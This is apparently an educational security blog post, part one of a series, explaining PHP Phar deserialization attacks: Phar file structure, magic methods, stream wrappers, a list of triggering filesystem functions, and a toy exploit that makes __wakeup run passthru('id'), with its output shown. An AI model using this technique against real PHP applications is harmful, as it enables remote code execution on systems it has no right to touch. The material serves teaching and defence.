Exploiting PHP Phar Deserialization Vulnerabilities: Part 1

Understanding the Inner Workings

INTRODUCTION

Phar deserialization is a relatively new vector for performing code reuse attacks on object-oriented PHP applications, publicly disclosed at Black Hat 2018 by security researcher Sam Thomas. Similar to ROP (return-oriented programming) attacks on compiled binaries, this type of exploitation is carried out through PHP object injection (POI), a form of property-oriented programming (POP) in the context of object-oriented PHP code.

Due to its novelty, this kind of attack vector gained increased attention from the security community in the past few months, leading to the discovery of remote code execution vulnerabilities in many widely deployed platforms, such as:

Throughout this series, we aim to describe Phar deserialization’s inner workings, with a hands-on approach to exploiting a remote code execution vulnerability in PhpBB 3.2.3.

ON PHAR FILES, DESERIALIZATION, AND PHP WRAPPERS

To better understand how this vector works, we need a bit of context regarding what Phar files are, how deserialization attacks work, what a PHP wrapper is, and how the three concepts interrelate.

What is a Phar File?

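Phar (PHp ARchive) files are a means to distribute PHP applications and libraries as a single file (similar to how JAR files work in the Java ecosystem). Phar files can also be included directly in your own PHP code. Structurally, they’re simply archives (tar files with optional gzip compression, or zip-based ones) made up of the following parts, as described by the PHP manual:

  1. A stub: PHP code that bootstraps the archive when it is run directly; at a minimum, it must contain <?php __HALT_COMPILER();
  2. A manifest describing the archive’s contents, which can also hold serialized metadata
  3. The file contents
  4. An optional signature for verifying the archive’s integrity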
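
To make this structure more concrete, here is a minimal sketch that builds a small archive with PHP's Phar class and reads back its stub, manifest metadata, file contents, and signature. The archive path, file name, and metadata values are made up for illustration, and we assume the script runs from the command line with archive creation enabled (phar.readonly is on by default).

```php
<?php
// Hypothetical path; the Phar class expects a ".phar" extension when creating.
$pharPath = sys_get_temp_dir() . '/structure_demo.phar';

if (!Phar::canWrite()) {
    // phar.readonly is enabled by default, which blocks archive creation.
    echo "Re-run with: php -d phar.readonly=0 <this script>\n";
} else {
    @unlink($pharPath);                        // start from a clean slate

    $phar = new Phar($pharPath);
    $phar->startBuffering();
    // 1. Stub: bootstrap code, must contain __HALT_COMPILER();
    $phar->setStub('<?php echo "stub ran\n"; __HALT_COMPILER(); ?>');
    // 2. Manifest metadata: stored in serialize() format
    $phar->setMetadata(['author' => 'demo', 'version' => 1]);
    // 3. File contents
    $phar->addFromString('hello.txt', "Hello from inside the archive\n");
    // 4. The signature is computed when the archive is written out
    $phar->stopBuffering();

    // Read the parts back through a second handle.
    $check = new Phar($pharPath);
    echo "stub:      ", trim($check->getStub()), "\n";
    echo "metadata:  ", json_encode($check->getMetadata()), "\n";
    echo "contents:  ", file_get_contents('phar://' . $pharPath . '/hello.txt');
    echo "signature: ", $check->getSignature()['hash_type'], "\n";
}
```

The part that matters for the rest of this article is the metadata: it can be any serializable PHP value, including an object.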

Understanding deserialization vulnerabilities

Serialization is the process of converting an object’s state into a storable representation (in PHP, a string), which allows it to be passed around or stored on disk, so it can be unserialized and used at a later time.

In PHP, the serialization process saves only an object’s class name and its properties, not its methods (hence the “property” in POP). This proves to be a smart design choice from a security perspective, except there’s one particularity that makes the deserialization process dangerous: the so-called magic methods.
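
As a quick illustration, the sketch below serializes an instance of a made-up Prefs class and prints the result. The class and its property names are assumptions chosen for the example; the point is that the output carries the class name and property values, but nothing about the method.

```php
<?php
class Prefs {
    public $theme = "light";
    public $size  = 12;

    // Methods are not part of the serialized form.
    public function describe() {
        return "{$this->theme}/{$this->size}";
    }
}

$serialized = serialize(new Prefs());
echo $serialized, "\n";
// O:5:"Prefs":2:{s:5:"theme";s:5:"light";s:4:"size";i:12;}

// unserialize() rebuilds the object from the class name and property values;
// the method body comes from the class definition loaded in this process.
$copy = unserialize($serialized);
echo $copy->describe(), "\n";   // light/12
```

Because the methods always come from the code already loaded on the target, an attacker who controls serialized data can only choose which existing class to instantiate and what its properties contain.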

These methods can be defined in any PHP class, have names prefixed with a double underscore, and are called implicitly on certain runtime events. By default, most of them do nothing, and it’s the developer’s job to define their behavior. In our case, the following two are worth mentioning, since they’re the only ones that get triggered on Phar deserialization:

  1. __wakeup(), invoked when an object is unserialized
  2. __destruct(), invoked when an object is destroyed, that is, when no references to it remain or the script ends
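
The two magic methods that matter most for deserialization, __wakeup() and __destruct(), can be observed with a small sketch. The Tracer class and its label property are hypothetical; the serialized string is written by hand so that no Tracer instance exists before unserialize() runs.

```php
<?php
class Tracer {
    public $label = "demo";

    public function __wakeup() {
        echo "__wakeup: {$this->label} was just unserialized\n";
    }

    public function __destruct() {
        echo "__destruct: {$this->label} is being destroyed\n";
    }
}

// Hand-written serialized form of a Tracer object.
$payload = 'O:6:"Tracer":1:{s:5:"label";s:4:"demo";}';

$obj = unserialize($payload);   // triggers __wakeup()
unset($obj);                    // last reference gone: triggers __destruct()
echo "done\n";
```

Neither method is called explicitly anywhere in the script; both run as a side effect of the object's life cycle.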

Let’s look at how a snippet of vulnerable code is exploited using this vector on the following dummy example:

# file: dummy_class.php
<?php
/* Let's suppose some serialized data is written on the disk with 
loose file permissions and gets read at a later time */
class Data {
  # Some default data
  public $data = array("theme"=>"light", "font"=>12);
  public $wake_func = "print_r";
  public $wake_args = "The data has been read!\n";

  # magic method that is called on deserialization
  public function __wakeup() {
    call_user_func($this->wake_func, $this->wake_args);
  }
}

# Acts as main: the block below runs only when this file is executed directly
if (basename($argv[0]) == basename(__FILE__)) {
  
  # Serialize the object and dump it to the disk; also free memory
  $data_obj = new Data();
  $fpath = "/tmp/777_file";

  file_put_contents($fpath, serialize($data_obj));
  echo "The data has been written.\n";
  unset($data_obj);

  # Wait for 60 seconds, then retrieve it 
  echo "(sleeping for 60 seconds…)\n";
  sleep(60);

  $new_obj = unserialize(file_get_contents($fpath));
}

We notice that, upon deserialization, the __wakeup method dynamically calls the function named by the object’s $wake_func property (print_r by default), passing it $wake_args as the argument. A simple run yields the following output:

$ php dummy_class.php 
The data has been written.
(sleeping for 60 seconds…)
The data has been read!

But what if, within the 60-second window, we manage to replace the serialized data with our own and take control of the function called upon deserialization? The following code shows how to accomplish this:

# file: exploit.php
<?php

require('dummy_class.php');
# Using the existing class definition, we create a crafted object and overwrite the
# existing serialized data with our own
$bad_obj = new Data();
$bad_obj->wake_func = "passthru";
$bad_obj->wake_args = "id";
$fpath = "/tmp/777_file";

file_put_contents($fpath, serialize($bad_obj));

Running the above snippet within the 60-second window, while dummy_class.php is sleeping, grants us code execution, even though the source of dummy_class.php hasn’t changed. This happens because the dynamic function call in __wakeup is driven entirely by the serialized object’s properties, which we changed so that the call becomes passthru("id").

$ php dummy_class.php
The data has been written.
(sleeping for 60 seconds…)
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)

In the context of PHP object injection (POI/deserialization) attacks, such reusable sequences of vulnerable code are called gadgets, and gadgets chained together to reach a dangerous call are called POP chains.

PHP Wrappers – Wrapping it Together

According to the PHP documentation, streams are the way of generalizing file, network, data compression, and other operations that share a common set of functions and uses. PHP wrappers take the daunting task of handling various protocols and providing a stream interface with the protocol’s data. These streams are usually used by filesystem functions such as fopen(), copy(), and filesize().
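
A short sketch may help show what "a common set of functions" means in practice: the same file_get_contents() call reads from two different wrappers, selected only by the scheme prefix of the path. The temporary file and the base64 string are made up for the example, and the list printed by stream_get_wrappers() depends on how PHP was built.

```php
<?php
// Wrappers registered in this PHP build (the exact list varies by build).
print_r(stream_get_wrappers());

// The same filesystem function, two different wrappers:
$tmp = tempnam(sys_get_temp_dir(), 'wrap');
file_put_contents($tmp, "from disk\n");

echo file_get_contents('file://' . $tmp);                            // local file
echo file_get_contents('data://text/plain;base64,SGVsbG8='), "\n";   // inline data: "Hello"

unlink($tmp);
```

The calling code does not change between the two reads; the wrapper named in the path decides how the bytes are fetched.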

A stream is accessed using a URL-like syntax scheme: wrapper://source. The most usual stream interfaces provided by PHP include file://, http://, ftp://, php://, zlib://, data://, glob://, and phar://.

The stream type of interest to us is (*drum roll*) the phar:// wrapper. A typical declaration has the form of phar://full/or/relative/path, and has two interesting properties:

Here is a list of filesystem functions that trigger phar deserialization:

copy                file_exists         file_get_contents   file_put_contents   
file                fileatime           filectime           filegroup           
fileinode           filemtime           fileowner           fileperms           
filesize            filetype            fopen               is_dir              
is_executable       is_file             is_link             is_readable         
is_writable         lstat               mkdir               parse_ini_file      
readfile            rename              rmdir               stat                
touch               unlink              
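
To see the trigger in isolation, here is a minimal two-step sketch, assuming a command-line PHP with the phar extension. The script name, archive path, and Canary class are hypothetical. The first step builds an archive whose metadata is an object; the second step, run as a separate process, only calls file_exists() on a phar:// path. Note that this behavior is version dependent: on PHP 7.x and earlier the metadata is unserialized automatically, while PHP 8.0 and later no longer do so on stream access, so there we would expect only the file_exists() result to be printed.

```php
<?php
// file: phar_trigger_demo.php (hypothetical name)
class Canary {
    public function __wakeup()   { echo "Canary::__wakeup fired\n"; }
    public function __destruct() { echo "Canary::__destruct fired\n"; }
}

$pharPath = sys_get_temp_dir() . '/trigger_demo.phar';   // hypothetical path
$mode     = $argv[1] ?? '';

if ($mode === 'build') {
    if (!Phar::canWrite()) {
        echo "Re-run with: php -d phar.readonly=0 phar_trigger_demo.php build\n";
    } else {
        @unlink($pharPath);
        $phar = new Phar($pharPath);
        $phar->startBuffering();
        $phar->setStub('<?php __HALT_COMPILER(); ?>');
        $phar->addFromString('a.txt', 'placeholder');
        $phar->setMetadata(new Canary());   // serialized into the manifest
        $phar->stopBuffering();
        echo "built $pharPath\n";
        // The Canary instance created above is destroyed when this run ends,
        // so __destruct is expected to fire once here as well.
    }
} elseif ($mode === 'trigger') {
    // No unserialize() call anywhere: only a filesystem function on phar://
    echo "calling file_exists()...\n";
    var_dump(file_exists('phar://' . $pharPath . '/a.txt'));
    echo "end of script\n";
} else {
    echo "usage: php phar_trigger_demo.php build|trigger\n";
}
```

Run it as php -d phar.readonly=0 phar_trigger_demo.php build, then php phar_trigger_demo.php trigger. On an affected version, the Canary messages in the second run come from the object stored in the archive's metadata, not from any object the trigger step created itself.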

How to Carry Out a Phar Deserialization Attack

At this point, we have all the ingredients for a recipe for exploitation. The required conditions for exploiting a Phar deserialization vulnerability usually consist of:

  1. The presence of a gadget/POP chain in an application’s source code (including third-party libraries), which allows for POI exploitation; most of the time, these are discovered by source code inspection
  2. The ability to include a local or remote malicious Phar file (most commonly, by file upload and relying on polyglots)
  3. An entry point, where a filesystem function gets called on a user-controlled phar wrapper, also discovered by source code inspection

For example, think of a poorly sanitized input field for setting a profile picture via a URL. The attacker sets the value of the input to the previously uploaded Phar/polyglot, rather than an http:// address (say phar://../uploads/phar_polyglot.jpg); on the server side, the backend performs a filesystem call on the provided wrapper, such as verifying that the file exists on the disk by calling file_exists("phar://../uploads/phar_polyglot.jpg"). At this very moment, the uploaded Phar’s metadata is unserialized, taking advantage of the gadgets/POP chains to complete the exploitation chain.
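
For contrast, here is a rough sketch of what a stricter check on such an input field might look like, assuming the application only ever needs http(s) URLs for remote avatars. The helper name is hypothetical, and this is one possible allow-list approach rather than a complete defense.

```php
<?php
// Hypothetical helper: accept only http(s) URLs for a remote avatar.
function is_allowed_avatar_url(string $url): bool {
    $scheme = parse_url($url, PHP_URL_SCHEME);
    // parse_url() yields null when no scheme is present and false on malformed input.
    if (!is_string($scheme)) {
        return false;
    }
    // Wrapper names are case-insensitive, so normalize before comparing.
    return in_array(strtolower($scheme), ['http', 'https'], true);
}

var_dump(is_allowed_avatar_url('https://example.com/me.png'));          // bool(true)
var_dump(is_allowed_avatar_url('phar://../uploads/phar_polyglot.jpg')); // bool(false)
var_dump(is_allowed_avatar_url('PHAR://../uploads/phar_polyglot.jpg')); // bool(false)
var_dump(is_allowed_avatar_url('../uploads/me.jpg'));                   // bool(false)
```

The important detail is that the check runs before any filesystem function touches the value, since even a seemingly harmless call such as file_exists() is enough to reach the phar:// wrapper.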

In part two of this blog series, we'll see how all of these concepts apply by getting our hands dirty and exploiting a remote code execution vulnerability in PhpBB 3.2.3 (CVE-2018-19274).

Written by Daniel Timofte
